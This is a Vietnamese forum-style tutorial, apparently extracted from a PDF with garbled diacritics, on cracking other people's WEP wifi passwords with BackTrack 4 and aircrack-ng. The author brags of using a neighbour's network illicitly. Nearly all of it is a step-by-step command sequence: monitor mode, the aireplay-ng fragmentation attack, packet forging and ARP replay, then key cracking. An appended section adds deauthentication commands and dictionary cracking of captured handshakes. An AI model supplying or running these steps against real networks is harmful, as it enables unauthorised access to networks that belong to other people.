Thôi không dài dòng nữa, topic hack password dạng Wepkey thì có nhiều rồi nhưng hướng dẫn dùng kỹ thuật Fragment để hack thì chưa có 1 topic đàng hoàng nào nói tới.. Bởi vậy, hôm nay Lãn
Trang 1TỔNG HỢP HACK WIFI
Hack pass wifi WEP key with Fragment no client
đăng 23:21 08-04-2011 bởi vuong truong [ đã cập nhật 23:46 08-04-2011 ]
Có thể nói hack pass Wifi là đề tài muôn thuở và mình đang online với các bạn cũng bằng wifi lậu đây Nói là lậu nhưng "key xịn", hehehe Thôi không dài dòng nữa, topic hack password dạng Wepkey thì có nhiều rồi nhưng hướng dẫn dùng kỹ thuật Fragment để hack thì chưa có 1 topic đàng hoàng nào nói tới
Bởi vậy, hôm nay Lãng tử xin mạo muội hướng dẫn các bạn dùng Fragment để hack pass Wepkey, không cần client
Nói đến đây chắc các bạn nào mới tập tành hack pass wifi sẽ không hiểu Không sao, mình sẽ hướng dẫn
từ đầu cho các bạn nào "mới vào nghề" luôn:
Phần 1: Giới thiệu và hướng dẫn về BackTrack
Tóm t t ph n 1 cho nh ng ai lắ ầ ữ ười đ c:ọ
Công c c n dùng:ụ ầ
- Phần mềm BackTrack 4 (BT4), download tại đây: http://www.backtrack-linux.org/downloads/
USB (dung lượng tùy vào bản bạn down) hoặc đĩa DVD để burn file iso vừa down về
- Phần mềm burn file iso về đĩa DVD (nếu muốn boot bằng USB thì khỏi cần cái này)
Hướng dẫn boot BT4 bằng USB: (Mình đã test với bản BT4 beta và USB 1GB)
Các bạn giải nén file iso vừa down về (dùng Ultra Iso hoặc Winrar) sẽ được 2 folder là boot và BT4 Copy 2 folder này vào USB
Sau đó vào ổ USB -> Vào boot -> Vào bootinst.bat Ta sẽ được:
Trang 2Bấm phím bất kỳ, ta sẽ được:
Bấm phím bất kỳ để hoàn thành
Vậy là "đồ nghề" đã xong ta tiến hành boot với USB hoặc đĩa DVD Bạn nào chưa chỉnh thứ tự ưu tiên boot thì vào BIOS chỉnh lại nhé, để ổ USB và DVD lên trên ổ cứng Ta tiến hành boot để vào BT4:
Cắm USB vào và bật máy tính, cứ để cho nó tự chạy Đến khi nó đòi log on thì:
-User: root
-Pass: toor (Lưu ý có nhiều máy khi gõ pass sẽ không hiển thị gì hết, bạn yên tâm cứ việc gõ, mặc kệ nó
có hiển thị hay không)
Ti p theo ta gõ:ế startx
Vậy là vào được BT4 rồi đó Mở 1 Shell (biểu tượng ô vuông màu đen ở góc trái dưới cùng đó) và làm theo các bước sau
Các b n có th làm theo hạ ể ướng d n nh trongẫ ư tài liệu sau Hoặc dùng thẳng kỹ
thuật Fragment ở phần 2 sẽ bảo đảm chắc chắn hack được pass Wepkey
Phần 2: Hướng dẫn kỹ thuật Fragment
Tại sao phải cần đến kỹ thuật này?
Trang 3- Vì chúng ta cần 1 máy victim đang kết nối với BSSID cần hack mà victim không có (chờ mãi mà không
có ai truy cập)
- Có máy victim nhưng chỉ chat thôi hay sao ấy, data không tăng hoặc tăng rất chậm, chờ cả ngày mà chẳng đủ 2500 Ivs, nói chi có thể phải cần hơn thế nữa
Và 1 vài nguyên nhân khác
Nếu bạn đang hack mà rơi vào các trường hợp trên hãy khởi động lại Back Track và dùng Fragment
Các bước thực hiện:
Phần trong ngoặc đơn () là chú thích nhé
Bước 1: M 1 Shell và gõở
airmon-ng
Bước 2: airmon-ng start wlan0 ( đây card wireless c a mình là wlan0)ở ủ
Bước 3: airodump-ng
Bước 4: airodump-ng mon0 (đã chuy n sang ch đ monitor)ể ế ộ
Bước 5: airodump-ng bssid {đ a ch MAC c a BSSID c n hack} channel ị ỉ ủ ầ
{channel c a BSSID c n hack} ivs -w capturefile mon0ủ ầ (capturefile là tên c a ủ file mà data được l u vào, b n có th đi n tên gì c ng đư ạ ể ề ũ ược nh ng đ n bư ế ước cu i ố
nh vi t đúng tên file này nhé )ớ ế
Bước 6: M 1 shell khác và gõ:ở
aireplay-ng -5 -b {đ a ch MAC c a BSSID c n hack} mon0ị ỉ ủ ầ (-5 chính là fragment
đó các b n)ạ
Ch 1 tý và ch n Yes, gõ ch "y" đó.ờ ọ ữ
Bước 7: M 1 Shell khácở
aireplay-ng -1 1 -a {đ a ch MAC c a BSSID c n hack} mon0ị ỉ ủ ầ
Quay l i Shell th 2 b n s th y xu t hi n file có d ngạ ứ ạ ẽ ấ ấ ệ ạ xor (Có là ta đã thành công
Trang 4r i đó)ồ
Bước 8: V n Shell th 2 nhéẫ ở ứ
packetforge-ng -0 -a {đ a ch MAC c a BSSID c n hack} -h 00:11:22:33:44:55 -k ị ỉ ủ ầ 255.255.255.255 -l 255.255.255.255 -y fragment- {tênfile.xor} -w arpy
Bước 9: aireplay-ng -3 -r arpy -b {đ a ch MAC c a BSSID c n hack} mon0ị ỉ ủ ầ
N u th y data t ng vù vù thì ch c ch n 99,99% ta đã thành công và pass đã hack ế ấ ă ắ ắ
được r i đóồ
Bước 10: ây là bĐ ước cu i cùng dùng đ b khóa lố ể ẻ ượng data mà ta thu về
aircrack-ng -b {đ a ch MAC c a BSSID c n hack} capturefile*.ivsị ỉ ủ ầ
Xong r i đó, l p l i bồ ậ ạ ước này n u BT yêu c u c n thêm data b n nhéế ầ ầ ạ
Và cu i cùng là là ta đã có pass sau bao ngày ch đ i ch còn gì n a ố ờ ợ ứ ữ
MORE 2 Đến bước 3 -> 4
+ ctrl c
1 airodump-ng –c chanel –w capturefilename mon0
new 2
+ aireplay-ng -0 1 –c essid mon0
+ aireplay-ng -0 1 –c station –c bssid mon0
New 2 or 3
Xem new đầu tiên, sau đó qua new 2 or new 3
+ dir
+ aircrack-ng –w /Desktop/test.lst capturefilename.cap
Nếu không đúng tên thì:
Mở new
Aircrack-ng –w /Desktop/test.lst capturefilename-01.cap (hoặc chép tên filename)